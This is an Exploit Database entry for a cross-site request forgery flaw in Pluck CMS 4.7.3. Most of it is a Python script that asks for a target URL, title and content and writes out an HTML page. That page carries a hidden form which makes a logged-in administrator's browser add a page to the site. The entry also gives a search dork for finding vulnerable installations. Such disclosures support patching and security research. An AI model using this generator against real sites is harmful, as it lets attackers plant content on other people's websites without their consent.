Pluck CMS 4.7.3 – Cross-Site Request Forgery (Add Page)

• Exploit Database
• 19 阅读

• 作者： Ahsan Tahir
  日期： 2016-10-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40566/

• # Exploit Title: Pluck CMS 4.7.3 - Add-Page Cross-Site Request Forgery
  # Exploit Author: Ahsan Tahir
  # Date: 18-10-2016
  # Software Link: http://www.pluck-cms.org/?file=download
  # Vendor: http://www.pluck-cms.org/
  # Google Dork: "2005-2016. pluck is available"
  # Contact: https://twitter.com/AhsanTahirAT | https://facebook.com/ahsantahiratofficial
  # Website: www.ahsan-tahir.com
  # Category: webapps
  # Version: 4.7.3
  # Tested on: [Kali Linux 2.0 | Windows 8.1]
  # Email: mrahsan1337@gmail.com
  
  import os
  import urllib
  
  if os.name == 'nt':
  		os.system('cls')
  else:
  	os.system('clear')
  
  def csrfexploit():
  
  	banner = '''
  	+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==+
  	|______ ____ ____ ____ |
  	| |_ \| |_ ____| | __/ ___|\// ___||
  	| | |_) | | | | |/ __| |/ / | | | |\/| \___ \|
  	| |__/| | |_| | (__| <| |___| || |___) | |
  	| |_| |_|\__,_|\___|_|\_\\____|_||_|____/|
  	|//PluckCMS 4.7.3 Add-Post CSRF Auto-Exploiter |
  	|> Exploit Author & Script Coder: Ahsan Tahir|
  	+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+
  	'''
  	print banner
  
  	url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://): "))
  	title = str(raw_input(" [+] Enter the Title of the Post which you want to add by exploiting CSRF: "))
  	content = raw_input(" [+] Enter the Content, which you want to add in the post by exploiting CSRF: ")
  
  	csrfhtmlcode = '''
  	<html>
  	<!-- CSRF PoC -->
  	<body>
  	<form action="%s/admin.php?action=editpage" method="POST">
  	<input type="hidden" name="title" value="%s" />
  	<input type="hidden" name="seo&#95;name" value="" />
  	<input type="hidden" name="content" value="%s" />
  	<input type="hidden" name="description" value="" />
  	<input type="hidden" name="keywords" value="" />
  	<input type="hidden" name="hidden" value="no" />
  	<input type="hidden" name="sub&#95;page" value="" />
  	<input type="hidden" name="theme" value="default" />
  	<input type="hidden" name="save" value="Save" />
  	<input type="submit" value="Submit request" />
  	</form>
  	</body>
  	</html>
  	''' %(url, title, content)
  
  	print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."
  
  	print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
  	extension = ".html"
  	name = raw_input(" Filename: ")
  	filename = name+extension
  	file = open(filename, "w")
  
  	file.write(csrfhtmlcode)
  	file.close()
  	print(" [+] Your exploit is saved as %s")%filename
  	print("")
  
  csrfexploit()